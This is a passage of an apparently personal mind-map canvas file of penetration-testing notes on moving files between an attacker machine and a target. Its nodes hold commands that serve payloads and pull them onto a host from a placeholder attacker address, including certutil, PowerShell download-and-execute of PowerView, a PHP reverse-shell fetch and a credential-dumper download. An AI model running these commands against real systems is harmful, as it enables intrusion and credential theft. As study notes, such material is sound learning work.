		{"type":"text","text":"","id":"c2c61b05251f2739","x":7140,"y":3228,"width":60,"height":420,"color":"#d8be13"},
		{"type":"text","text":"```php\n<?php file_put_contents(\"/tmp/php-reverse-shell.txt\", fopen(\"http://<IP-ATTACKER>/php-reverse-shell.txt\", \"r\")); ?>\n```","id":"be612178a8bb1381","x":7320,"y":3670,"width":940,"height":100},
		{"type":"text","text":"PHP","id":"216b7b40feb0214e","x":8340,"y":3690,"width":115,"height":60},
		{"type":"text","text":"```cmd\npython.exe -c \"import urllib2; print urllib2.urlopen('http://<IP-ATTACKER>/fgdump.exe').read()\" > fgdump.exe\n```","id":"c52766ba41c12492","x":7320,"y":3780,"width":940,"height":75},
		{"type":"text","text":"Python","id":"3e4bedcb3ca16c07","x":8340,"y":3788,"width":115,"height":60},
		{"type":"text","text":"```cmd\nnc -nlvp 4444 > incoming.exe\n```","id":"b695a69ef6f29f11","x":7320,"y":3875,"width":680,"height":50},
		{"type":"text","text":"Just copy via the GUI","id":"62cc2d85497ad911","x":7760,"y":4220,"width":240,"height":60},
		{"type":"text","text":"```cmd\nsocat TCP4:10.11.0.4:443 file:<FILE-NAME>,create\n```","id":"78a470023a061d53","x":7320,"y":3980,"width":680,"height":60},
		{"type":"text","text":"```cmd\ncertutil -urlcache -f http://IP-attacker/filename.exe shell.exe\n```","id":"6316efe8da8a0631","x":7320,"y":3598,"width":680,"height":60},
		{"type":"text","text":"```cmd\ncopy \\\\0.0.0.0\\share\\filename.exe C:\\users\\public\\music\\filename.exe\n# if created with credentials, them is required to mount the SMB with the creds\nnet use n: \\\\192.168.220.133\\share /user:test test\n```","id":"2e179fc61a34e29a","x":7320,"y":4070,"width":740,"height":120},
		{"type":"text","text":"FTP","id":"47106886b6da1fc4","x":8660,"y":3140,"width":156,"height":60},
		{"type":"text","text":"Web","id":"9cab4bd7b4aedf18","x":8660,"y":3548,"width":156,"height":60},
		{"type":"text","text":"Socat","id":"4d2687d6ab9ad1db","x":8660,"y":3982,"width":156,"height":60},
		{"type":"text","text":"SMB","id":"2925b9b2b4219b72","x":8660,"y":4102,"width":156,"height":60},
		{"type":"text","text":"Netcat","id":"329a3cd59f05cbd3","x":8660,"y":3872,"width":156,"height":60},
		{"type":"text","text":"```bash\nget <FILE-NAME>\n```","id":"5841bdd22cd930d1","x":7320,"y":3138,"width":280,"height":60},
		{"type":"text","text":"```bash\nftp <IP-ATTACKER>\n```","id":"03418a977bef5fae","x":8274,"y":3138,"width":258,"height":60},
		{"type":"text","text":"```powershell\nPowerShell.exe -ExecutionPolicy Bypass\n```","id":"caaf6507395bc64b","x":8037,"y":3277,"width":418,"height":60},
		{"type":"text","text":"```powershell\n1. powershell -c \"(new-object System.Net.WebClient).DownloadFile('http://<IP-ATTACKER>/wget.exe','C:\\Users\\Public\\Desktop\\wget.exe')\"\n2. (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')\n3. (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')\n4. Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\n```","id":"f88296f1c79dc695","x":7320,"y":3368,"width":1212,"height":140},
		{"type":"text","text":"```powershell\niex(new-object net.webclient).downloadstring('(https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')\n```","id":"44b86b6476dfbf35","x":7320,"y":3255,"width":680,"height":103},
		{"type":"text","text":"Single file","id":"eaf12afed6faa47f","x":8014,"y":3138,"width":160,"height":60},
		{"type":"text","text":"```powershell\ncurl http://<IP-ATTACKER>/<FILE> -o <file>\n```","id":"d4394602cf3638cb","x":7320,"y":3518,"width":680,"height":60},
		{"type":"text","text":"","id":"224e702c33b48662","x":6560,"y":2170,"width":60,"height":60,"color":"#ff00bb"},
		{"id":"8b5d40ca0716120a","type":"text","text":"","x":6560,"y":2250,"width":60,"height":60,"color":"5"},
		{"type":"text","text":"","id":"048bd45e97ac5e8e","x":6560,"y":2350,"width":60,"height":60,"color":"#813dff"},
		{"type":"text","text":"","id":"528cb8a87d17dc35","x":6560,"y":2442,"width":60,"height":557,"color":"#d8be13"},
		{"type":"text","text":"","id":"9aa5d75e4c1ad958","x":7110,"y":1510,"width":60,"height":60,"color":"#009e1a"},
		{"type":"text","text":"```cmd\nftp -i -s:ftp.txt\n```","id":"20d8e7694a445abb","x":7350,"y":2850,"width":250,"height":60},
		{"id":"141af34cfbec31a8","type":"text","text":"","x":7140,"y":2568,"width":60,"height":60,"color":"5"},
		{"type":"text","text":"","id":"f45b5e8cc10bbcac","x":6560,"y":2030,"width":60,"height":60,"color":"#009e1a"},
		{"type":"text","text":"```bash\nscp local_file.txt USER@HOST_IP:/tmp/remote_file.txt\n```","id":"799be8c0837a4cef","x":5438,"y":2030,"width":854,"height":60},
		{"type":"text","text":"\n```bash\nsystemctl start pure-ftpd\n```\n","id":"f3ea36b511e6cb38","x":5438,"y":2350,"width":609,"height":60},
		{"type":"text","text":"```bash\nsudo systemctl start ssh\n```","id":"c0ee4acd6dcb04a5","x":5439,"y":2170,"width":609,"height":60},
		{"id":"75d8442cea24c488","type":"text","text":"```bash\nsudo pip3 install pyftpdlib\n```","x":5439,"y":2250,"width":326,"height":60},
		{"id":"f91d0aecffc4f105","type":"text","text":"```bash\nsudo python3 -m pyftpdlib --port 21\n```","x":5905,"y":2250,"width":387,"height":60},
		{"id":"a0bb132ce05efef7","type":"text","text":"FTP Server","x":5200,"y":2250,"width":130,"height":60},
		{"type":"text","text":"FTP","id":"160e4136e5386cc0","x":4780,"y":2350,"width":250,"height":60},
		{"type":"text","text":"pure FTP","id":"5586847624a81ef2","x":5200,"y":2350,"width":140,"height":60},
		{"type":"text","text":"```bash\nsudo impacket-smbserver share $(pwd) -smb2support\n# if erase errors for unauthenticated guest access\nsudo impacket-smbserver share -smb2support $(pwd) -user test -password \n```","id":"b5241b6b165b8315","x":5449,"y":3320,"width":653,"height":120},
		{"type":"text","text":"WWWtree","id":"6fad934266a7788c","x":5200,"y":2441,"width":140,"height":60},
		{"type":"text","text":"Web","id":"223ffcd06c3c1cc2","x":4780,"y":2680,"width":250,"height":60},
		{"type":"text","text":"netcat","id":"d3221962061d7f0f","x":4791,"y":3090,"width":250,"height":60},
		{"type":"text","text":"Socat","id":"d1a38718e74294e4","x":4791,"y":3210,"width":250,"height":60},
		{"type":"text","text":"Python","id":"031f874932aea545","x":5438,"y":2520,"width":125,"height":60},
		{"type":"text","text":"Python3","id":"4cfab0a47ea31f54","x":5438,"y":2609,"width":125,"height":60},
		{"type":"text","text":"```bash\nservice apache2 start\n```","id":"be169cacc794bf37","x":5438,"y":2760,"width":367,"height":60},
		{"type":"text","text":"","id":"e499c969e5800a32","x":6560,"y":3350,"width":60,"height":60,"color":"#00ccff"},
		{"type":"text","text":"\n```bash\nsudo python3 -m http.server 80\n```\n","id":"55b6d27d3a3e25c6","x":5606,"y":2611,"width":441,"height":58},
		{"type":"text","text":"\n```bash\nsudo python -m SimpleHTTPServer 80\n```\n","id":"fddf66eb4ff12f08","x":5606,"y":2521,"width":441,"height":58},
		{"type":"text","text":"\n```bash\nruby -rwebrick -e \"WEBrick::HTTPServer.new(:Port => 8080, :DocumentRoot => Dir.pwd).start\"\n```\n","id":"06c62ba47f1e50ab","x":5438,"y":2940,"width":922,"height":58},
		{"type":"text","text":"","id":"c4f5861a36279157","x":6560,"y":3085,"width":60,"height":60,"color":"2"},
		{"type":"text","text":"\n```bash\nruby -run -e httpd . -p 9000\n```","id":"895c29f7455cc023","x":5438,"y":2850,"width":441,"height":58},
		{"id":"81e59a7263ddf314","type":"text","text":"```\nC:\\htb> echo open 192.168.49.128 > ftpcommand.txt\nC:\\htb> echo USER anonymous >> ftpcommand.txt\nC:\\htb> echo binary >> ftpcommand.txt\nC:\\htb> echo GET file.txt >> ftpcommand.txt\nC:\\htb> echo bye >> ftpcommand.txt\nC:\\htb> ftp -v -n -s:ftpcommand.txt\n\nC:\\htb>more file.txt\n```","x":7350,"y":2470,"width":521,"height":256},
		{"type":"text","text":"```cmd\nopen <IP-ATTACKER> \n<USERNAME>\n<PASSWORD>\nbinary\nmget file.exe\ndisconnect\nquit\n```","id":"2f8f3df1d411ad0b","x":7620,"y":2750,"width":250,"height":260},
		{"id":"ec22a913248692bf","type":"text","text":"Create CommandFile to FTP Client","x":8174,"y":2568,"width":299,"height":60},
		{"type":"text","text":"RDP","id":"50074d84e4e9d7d9","x":8660,"y":4222,"width":156,"height":60},
		{"type":"text","text":"Multiple files","id":"e724a98f6db0d4bc","x":8014,"y":3029,"width":160,"height":60},
		{"type":"text","text":"","id":"eb62ad9b53d494db","x":7140,"y":3029,"width":60,"height":60,"color":"#813dff"},
		{"type":"text","text":"```bash\nmget <FILE-*>\n```","id":"cd460cde27c9346e","x":7320,"y":3029,"width":280,"height":60},
		{"type":"text","text":"Download file(s)","id":"6dba24947179a28b","x":8980,"y":3600,"width":220,"height":60},
		{"type":"text","text":"","id":"565ad1c87dccd73f","x":7140,"y":4300,"width":60,"height":60,"color":"3"},
		{"type":"text","text":"winRM","id":"bef0ac90542e4a99","x":8660,"y":4302,"width":156,"height":60},
		{"type":"text","text":"SCP","id":"14f3cfe08c53f43c","x":4780,"y":2030,"width":250,"height":60},
		{"type":"text","text":"SSH","id":"d01f5285b0bc1753","x":4780,"y":2170,"width":250,"height":60},
		{"type":"text","text":"```bash\npython3 /opt/wwwtree/wwwtree.py -r ~/transfer/ -i tun0 -p 80\n```","id":"38b3ecefe88947a5","x":5438,"y":2441,"width":830,"height":58},
		{"type":"text","text":"Host file(s)","id":"1fd5b6e4b443eb54","x":4420,"y":2850,"width":160,"height":60}
	],
	"edges":[
		{"id":"fbb77b8cdbdc9c0d","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"e7518bfe4e3d2a04","toSide":"left"},
		{"id":"fcbf07ec54779a6f","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"a5657be0052b21b4","toSide":"left"},
		{"id":"78c177a4e17e3da0","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"b597428b8f16e360","toSide":"left"},
		{"id":"c9ed8c98a9f9cd7c","fromNode":"de583cf5c784e101","fromSide":"right","toNode":"77071a338b4ae4d0","toSide":"left"},
		{"id":"b91afa9f51c4cdd2","fromNode":"b597428b8f16e360","fromSide":"right","toNode":"7182ca8d7591ad6f","toSide":"left"},
		{"id":"5bfd2e9803c16bb1","fromNode":"7182ca8d7591ad6f","fromSide":"right","toNode":"41ba20af7431563f","toSide":"left"},
		{"id":"ae2e1e8146ee7f2b","fromNode":"77071a338b4ae4d0","fromSide":"right","toNode":"7cc43aa399754661","toSide":"left"},
		{"id":"97279056f8157603","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"e5712d4396ae46c0","toSide":"left"},
		{"id":"ce9a32f5d5b02606","fromNode":"e5712d4396ae46c0","fromSide":"right","toNode":"76744c6f93744040","toSide":"left"},
		{"id":"3e944cd077abe74c","fromNode":"7cc43aa399754661","fromSide":"right","toNode":"971ac7a48bc9d48a","toSide":"left"},
		{"id":"555a01160ee57a59","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"b43cdd2457a7e306","toSide":"right"},
		{"id":"fcc549cfbee7f550","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"d45048da5b52c0e8","toSide":"right"},
		{"id":"9a44997268df2927","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"41096355fc79982d","toSide":"right"},
		{"id":"94a70fe5b2e8a501","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"1b428995d89bac51","toSide":"right"},
		{"id":"b23cc9d4ba0a358b","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"e81977e44c9be781","toSide":"right"},
		{"id":"91945b68df2c343b","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"2beb0f379f15cf91","toSide":"right"},
		{"id":"3637b4497fdd3063","fromNode":"87cbabd65a20471d","fromSide":"left","toNode":"e654e7d64ef63509","toSide":"right"},
		{"id":"bbe60e18cceddb3d","fromNode":"14f23e71f8aef871","fromSide":"right","toNode":"04b72fc063be29c4","toSide":"left","color":"#e100ff"},
		{"id":"b5083ffca6ea3566","fromNode":"a84cf981923b7f68","fromSide":"left","toNode":"7dd0c1a9782a1259","toSide":"right","color":"#d8be13"},
		{"id":"fe0e4522b14b9d40","fromNode":"ade906f9fa3719d4","fromSide":"left","toNode":"7dd0c1a9782a1259","toSide":"right","color":"#d8be13"},
		{"id":"9ac318ecb057e5c6","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"2ad3fca3d7ebf6d9","toSide":"right"},
		{"id":"737273cbfb38af62","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"87cbabd65a20471d","toSide":"right"},
		{"id":"d605070482ce80e0","fromNode":"2ad3fca3d7ebf6d9","fromSide":"left","toNode":"5bf710169d6525f9","toSide":"right"},
		{"id":"5c5ce08b989a2a41","fromNode":"5bf710169d6525f9","fromSide":"left","toNode":"206d8a6ac4824b5e","toSide":"right"},
		{"id":"606fd6b8dc8b4145","fromNode":"41ba20af7431563f","fromSide":"right","toNode":"99bfa859aa5eaaf0","toSide":"left"},
		{"id":"71f8237bd5ea08fc","fromNode":"206d8a6ac4824b5e","fromSide":"left","toNode":"99bfa859aa5eaaf0","toSide":"right","color":"#00ccff"},
		{"id":"4a97dde41300da34","fromNode":"e654e7d64ef63509","fromSide":"left","toNode":"04b72fc063be29c4","toSide":"right"},
		{"id":"00e482679c957cfd","fromNode":"76744c6f93744040","fromSide":"right","toNode":"943c0a1d0316a739","toSide":"left"},
		{"id":"e09740b5811f2461","fromNode":"da3be8f1fa1efbaa","fromSide":"left","toNode":"943c0a1d0316a739","toSide":"right","color":"2"},
		{"id":"574911bdc5942a6a","fromNode":"b92ed687ac196517","fromSide":"left","toNode":"943c0a1d0316a739","toSide":"right","color":"2"},
		{"id":"2ec842f4b75e3a52","fromNode":"2beb0f379f15cf91","fromSide":"left","toNode":"4f05cb4216e3f2ff","toSide":"right"},
		{"id":"f1f0687753284b2c","fromNode":"4f05cb4216e3f2ff","fromSide":"left","toNode":"da3be8f1fa1efbaa","toSide":"right"},
		{"id":"430672ec9b05228c","fromNode":"41096355fc79982d","fromSide":"left","toNode":"17dcfbccec1e4758","toSide":"right"},
		{"id":"8a896c499fa58b95","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"bb61437274480bce","toSide":"left"},
		{"id":"86b22e6c402c4a33","fromNode":"bb61437274480bce","fromSide":"right","toNode":"bb057ca10ad0dd92","toSide":"left"},
		{"id":"d872b01972d1240d","fromNode":"bb057ca10ad0dd92","fromSide":"right","toNode":"9fc36171dc101cae","toSide":"left"},
		{"id":"c258558ff55534bc","fromNode":"321f3a413498b2ce","fromSide":"left","toNode":"9fc36171dc101cae","toSide":"right","color":"4"},
		{"id":"c90b057b9efb950c","fromNode":"01242ee3bd640059","fromSide":"left","toNode":"321f3a413498b2ce","toSide":"right"},
		{"id":"bbfb9e054ab7ff60","fromNode":"c69ddc1b9670e9d5","fromSide":"left","toNode":"01242ee3bd640059","toSide":"right"},
		{"id":"3761f7f37883bb23","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"c69ddc1b9670e9d5","toSide":"right"},
		{"id":"17a2f91364915e49","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"de812d21785b5051","toSide":"left"},
		{"id":"25e6ccccf41b7e42","fromNode":"519fb02a7d927135","fromSide":"right","toNode":"2bd6bbbe250c523b","toSide":"left"},
		{"id":"43858a6311868ce1","fromNode":"2bd6bbbe250c523b","fromSide":"right","toNode":"c8cd070b275877d0","toSide":"left"},
		{"id":"6e8140a88c2e72b0","fromNode":"c8cd070b275877d0","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"85dfb871b0d94439","fromNode":"1bf9e55a732d0cd2","fromSide":"left","toNode":"1f0cc683a5d4144e","toSide":"right","color":"#813dff"},
		{"id":"2a927686cd669a99","fromNode":"319bed429aa52a55","fromSide":"left","toNode":"1f0cc683a5d4144e","toSide":"right","color":"#813dff"},
		{"id":"33e5f5be632d266d","fromNode":"5f3d917251ff518b","fromSide":"left","toNode":"ceca3ee191cc6b7b","toSide":"right"},
		{"id":"ee5b5971cb455eba","fromNode":"5f3d917251ff518b","fromSide":"left","toNode":"5bdd930adaab59f8","toSide":"right"},
		{"id":"ff6cc8c51e8f9468","fromNode":"ceca3ee191cc6b7b","fromSide":"left","toNode":"f54f7348f66ffc4e","toSide":"right"},
		{"id":"3a799841a2fb2988","fromNode":"5bdd930adaab59f8","fromSide":"left","toNode":"3076e110475c68ec","toSide":"right"},
		{"id":"2780f51ddbf79095","fromNode":"3076e110475c68ec","fromSide":"left","toNode":"1bf9e55a732d0cd2","toSide":"right"},
		{"id":"f906df908c9c67e2","fromNode":"f54f7348f66ffc4e","fromSide":"left","toNode":"1bf9e55a732d0cd2","toSide":"right"},
		{"id":"e9e38d20c4214476","fromNode":"b43cdd2457a7e306","fromSide":"left","toNode":"5f3d917251ff518b","toSide":"right"},
		{"id":"2767f83496e3f037","fromNode":"17dcfbccec1e4758","fromSide":"left","toNode":"b92ed687ac196517","toSide":"right"},
		{"id":"4722a4cc33c6f32a","fromNode":"4eeb888b123623cf","fromSide":"left","toNode":"f0f11e4dd6631dc6","toSide":"right"},
		{"id":"7097c64f81dca066","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"162af4fbd5ef72dd","toSide":"right"},
		{"id":"c142cfd00e130eba","fromNode":"162af4fbd5ef72dd","fromSide":"left","toNode":"4eeb888b123623cf","toSide":"right"},
		{"id":"a85e2235fc94321f","fromNode":"f0f11e4dd6631dc6","fromSide":"left","toNode":"0887979d73fc6e82","toSide":"right","color":"#ff00bb"},
		{"id":"26441e8e4a771f66","fromNode":"de812d21785b5051","fromSide":"right","toNode":"020fb08309842c83","toSide":"left"},
		{"id":"5da6e941a784bd0e","fromNode":"020fb08309842c83","fromSide":"right","toNode":"0887979d73fc6e82","toSide":"left"},
		{"id":"a865a035b2f9dd19","fromNode":"7c31c9ead21cc3be","fromSide":"left","toNode":"669a918965c11e35","toSide":"right"},
		{"id":"61c24f9e36b3050e","fromNode":"c74e4313eb6bdacf","fromSide":"left","toNode":"7c31c9ead21cc3be","toSide":"right"},
		{"id":"5169b8965f49dd25","fromNode":"1b428995d89bac51","fromSide":"left","toNode":"c74e4313eb6bdacf","toSide":"right"},
		{"id":"af015ecf7b7cb515","fromNode":"669a918965c11e35","fromSide":"left","toNode":"319bed429aa52a55","toSide":"right"},
		{"id":"1595b3ff03814a70","fromNode":"81751f83cae24cbb","fromSide":"left","toNode":"319bed429aa52a55","toSide":"right"},
		{"id":"16243d301e2b0c8e","fromNode":"0a7dd691df937c39","fromSide":"left","toNode":"81751f83cae24cbb","toSide":"right"},
		{"id":"cb27c52996a4f7e3","fromNode":"3eaa0c2c8318667c","fromSide":"left","toNode":"0a7dd691df937c39","toSide":"right"},
		{"id":"1bff59db041d7480","fromNode":"c74e4313eb6bdacf","fromSide":"left","toNode":"3eaa0c2c8318667c","toSide":"right"},
		{"id":"4810ecdbfcaaba45","fromNode":"3eaa0c2c8318667c","fromSide":"left","toNode":"9e67a4eb98d2ac33","toSide":"right"},
		{"id":"2d8a14dab4fd4beb","fromNode":"9e67a4eb98d2ac33","fromSide":"left","toNode":"319bed429aa52a55","toSide":"right"},
		{"id":"20f0ebd752730be6","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"c3fc32194eed48db","toSide":"right"},
		{"id":"1dac01fecac18110","fromNode":"c3fc32194eed48db","fromSide":"left","toNode":"98870cc09701b962","toSide":"right"},
		{"id":"053d94031f6d6977","fromNode":"98870cc09701b962","fromSide":"left","toNode":"f26fedc63ca81598","toSide":"right"},
		{"id":"c28ee4bca2807ed9","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"d19eaf65d255b3e9","toSide":"left"},
		{"id":"ab03ea506acd0980","fromNode":"d19eaf65d255b3e9","fromSide":"right","toNode":"0b103e4040e84c63","toSide":"left"},
		{"id":"65d187fe19837d5e","fromNode":"0b103e4040e84c63","fromSide":"right","toNode":"e77cabc74a6b8e6b","toSide":"left"},
		{"id":"827ef759fc8e86fa","fromNode":"e77cabc74a6b8e6b","fromSide":"right","toNode":"f26fedc63ca81598","toSide":"left","color":"#009e1a"},
		{"id":"5f741bb1a1a71fad","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"664adbb7ea9bdbbc","toSide":"right"},
		{"id":"f6d35fb339fc6b50","fromNode":"664adbb7ea9bdbbc","fromSide":"left","toNode":"053e7e8f3c315c09","toSide":"right"},
		{"id":"f0e1d92630061260","fromNode":"1ca60381a66b2f39","fromSide":"right","toNode":"053e7e8f3c315c09","toSide":"left","color":"3"},
		{"id":"423123fa0bc26b3b","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"27670e51f3e77954","toSide":"left"},
		{"id":"e2b242aaaba1934b","fromNode":"27670e51f3e77954","fromSide":"right","toNode":"732d7c2c11f71f65","toSide":"left"},
		{"id":"e50e85d0db9b667d","fromNode":"732d7c2c11f71f65","fromSide":"right","toNode":"93849ad34b5459f2","toSide":"left"},
		{"id":"691b05f84721cc64","fromNode":"93849ad34b5459f2","fromSide":"right","toNode":"1ca60381a66b2f39","toSide":"left"},
		{"id":"50fbb47806d9af94","fromNode":"a5657be0052b21b4","fromSide":"right","toNode":"de583cf5c784e101","toSide":"left"},
		{"id":"6e8cf9582e4a0500","fromNode":"1423974a6d1ba0d1","fromSide":"left","toNode":"9874eb1622fe61eb","toSide":"right"},
		{"id":"6f8106062f2d3ba9","fromNode":"1da1bf62207b73bf","fromSide":"left","toNode":"94a0e4970e720140","toSide":"right"},
		{"id":"7c48ae13533edac8","fromNode":"dda50923a07f19b6","fromSide":"left","toNode":"8dd532d66174f834","toSide":"right"},
		{"id":"c5b9e6eee2c3c539","fromNode":"1da1bf62207b73bf","fromSide":"left","toNode":"dda50923a07f19b6","toSide":"right"},
		{"id":"1b1ce095ef8b5ac8","fromNode":"a5657be0052b21b4","fromSide":"right","toNode":"a77417db335770b4","toSide":"left"},
		{"id":"b8a7ddb8880e885f","fromNode":"a77417db335770b4","fromSide":"right","toNode":"59170f3ea19b642f","toSide":"left"},
		{"id":"310e209c174aafda","fromNode":"a77417db335770b4","fromSide":"right","toNode":"80d99aedeb039daa","toSide":"left"},
		{"id":"9e33d09110c854e1","fromNode":"a77417db335770b4","fromSide":"right","toNode":"d6d94240af95f1fa","toSide":"left"},
		{"id":"d2f69d571eb7aed5","fromNode":"59170f3ea19b642f","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"dd8efb6596588177","fromNode":"80d99aedeb039daa","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"3d6cbd36c1b53fc3","fromNode":"d6d94240af95f1fa","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"ec0e56e8e42a38b6","fromNode":"52c73efa9250685c","fromSide":"right","toNode":"eb173489af0c76d1","toSide":"left"},
		{"id":"3716bcfc0d19d0cb","fromNode":"310fc0d025eaa781","fromSide":"right","toNode":"61a872e658dfe5c0","toSide":"left"},
		{"id":"bf0ddd36b7228d18","fromNode":"abe18e07d0219c92","fromSide":"right","toNode":"310fc0d025eaa781","toSide":"left"},
		{"id":"d7d5b1d02072bf04","fromNode":"abe18e07d0219c92","fromSide":"right","toNode":"52c73efa9250685c","toSide":"left"},
		{"id":"45d7eff695547de8","fromNode":"59570f94b9250d2e","fromSide":"right","toNode":"abe18e07d0219c92","toSide":"left"},
		{"id":"22b76b8d62e1e387","fromNode":"61a872e658dfe5c0","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"5328456aa7b3ad17","fromNode":"eb173489af0c76d1","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"d8f59b9b8915a0b1","fromNode":"e7518bfe4e3d2a04","fromSide":"right","toNode":"59570f94b9250d2e","toSide":"left"},
		{"id":"2eed3fab512fb721","fromNode":"e7518bfe4e3d2a04","fromSide":"right","toNode":"519fb02a7d927135","toSide":"left"},
		{"id":"3a68f95862e37b2c","fromNode":"0e6da9744b61366c","fromSide":"left","toNode":"66a989b2ce7955a1","toSide":"right"},
		{"id":"de13657a42efd0d0","fromNode":"66a989b2ce7955a1","fromSide":"left","toNode":"a84cf981923b7f68","toSide":"right"},
		{"id":"a67b5c56e205ebc7","fromNode":"1dd46bc058c62b3c","fromSide":"left","toNode":"11707e48c1e1a141","toSide":"right"},
		{"id":"edc05454956997da","fromNode":"5366fb544222be19","fromSide":"left","toNode":"1dd46bc058c62b3c","toSide":"right"},
		{"id":"c03eaaabdead7f8a","fromNode":"cf5e7178a6c07781","fromSide":"left","toNode":"287373da86ddd7bd","toSide":"right"},
		{"id":"984bc6f3724ad3ea","fromNode":"d45048da5b52c0e8","fromSide":"left","toNode":"cf5e7178a6c07781","toSide":"right"},
		{"id":"594cc0e0e2948ebd","fromNode":"287373da86ddd7bd","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"e9e6c5b2c61cffd1","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"0df34b2ce7779a14","toSide":"left"},
		{"id":"4b3251e2c4898e5c","fromNode":"0df34b2ce7779a14","fromSide":"right","toNode":"81e94ba50e067092","toSide":"left"},
		{"id":"855b9b6ce02a6607","fromNode":"81e94ba50e067092","fromSide":"right","toNode":"8209634c9d537ed4","toSide":"left"},
		{"id":"26384083e35d7add","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"f3ad80bcfe018a40","toSide":"right"},
		{"id":"530ff2b884169d38","fromNode":"f3ad80bcfe018a40","fromSide":"left","toNode":"7e49eb10ca6f5757","toSide":"right"},
		{"id":"d7f2127ef90e0b1c","fromNode":"7e49eb10ca6f5757","fromSide":"left","toNode":"9064238ac18087ba","toSide":"right"},
		{"id":"c915ade9cecc845e","fromNode":"9064238ac18087ba","fromSide":"left","toNode":"8209634c9d537ed4","toSide":"right","color":"#3dfffc"},
		{"id":"5a055a3b5e2f0e57","fromNode":"77071a338b4ae4d0","fromSide":"top","toNode":"d54377d7edd089e0","toSide":"left"},
		{"id":"99321de027e150ff","fromNode":"d54377d7edd089e0","fromSide":"bottom","toNode":"7cc43aa399754661","toSide":"top"},
		{"id":"eec8cac78b70c02f","fromNode":"de583cf5c784e101","fromSide":"right","toNode":"4f0282692097be94","toSide":"left"},
		{"id":"b2678bbb415be731","fromNode":"e027d50cd519e8b9","fromSide":"right","toNode":"04b04eb552ce441d","toSide":"left"},
		{"id":"ad6cbcaf4fdafc87","fromNode":"16a8d9f4d6ce0925","fromSide":"right","toNode":"17b0029c99e27636","toSide":"left"},
		{"id":"17694eb6c37023f6","fromNode":"519fb02a7d927135","fromSide":"right","toNode":"e027d50cd519e8b9","toSide":"left"},
		{"id":"9a0cb1b5d338c916","fromNode":"519fb02a7d927135","fromSide":"right","toNode":"16a8d9f4d6ce0925","toSide":"left"},
		{"id":"e67abb22ce10d444","fromNode":"04b04eb552ce441d","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"d5cf4c504d0bb217","fromNode":"17b0029c99e27636","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"2737d3ea8c7f7b44","fromNode":"b43cdd2457a7e306","fromSide":"left","toNode":"03ef73ab057c6aa8","toSide":"right"},
		{"id":"0f2b5e418f7d50b2","fromNode":"03ef73ab057c6aa8","fromSide":"left","toNode":"72949c86b6c72209","toSide":"right"},
		{"id":"323f6b382add9a43","fromNode":"72949c86b6c72209","fromSide":"left","toNode":"1bf9e55a732d0cd2","toSide":"right"},
		{"id":"dd1ffa7427c59632","fromNode":"11707e48c1e1a141","fromSide":"left","toNode":"971ac7a48bc9d48a","toSide":"right","color":"#f0ff24"},
		{"id":"5411dd39030427d0","fromNode":"4f0282692097be94","fromSide":"right","toNode":"3617fc4e04469b66","toSide":"left"},
		{"id":"48189aa39cb869cb","fromNode":"3617fc4e04469b66","fromSide":"right","toNode":"971ac7a48bc9d48a","toSide":"left"},
		{"id":"11a500c79b29bd2e","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"e6080f5fcb0e0aa1","toSide":"right"},
		{"id":"2cd21305d33b6037","fromNode":"e6080f5fcb0e0aa1","fromSide":"left","toNode":"2ff0f3e439b8dd09","toSide":"right"},
		{"id":"9d62d5fa16abc039","fromNode":"2ff0f3e439b8dd09","fromSide":"left","toNode":"c13ccadb8997ef05","toSide":"right"},
		{"id":"c7caba09216d8ac0","fromNode":"c13ccadb8997ef05","fromSide":"left","toNode":"9fc36171dc101cae","toSide":"right","color":"4"},
		{"id":"95687efa2929dd67","fromNode":"94a0e4970e720140","fromSide":"left","toNode":"8c2a93016be5b298","toSide":"right"},
		{"id":"b2756bcd091e96c9","fromNode":"1423974a6d1ba0d1","fromSide":"left","toNode":"b13418b4cc74fb85","toSide":"right"},
		{"id":"b5b37373b6bbc65a","fromNode":"d45048da5b52c0e8","fromSide":"left","toNode":"1423974a6d1ba0d1","toSide":"right"},
		{"id":"c2b5a42ff58fe923","fromNode":"d45048da5b52c0e8","fromSide":"left","toNode":"1da1bf62207b73bf","toSide":"right"},
		{"id":"c5174195f8dd1e8b","fromNode":"9874eb1622fe61eb","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
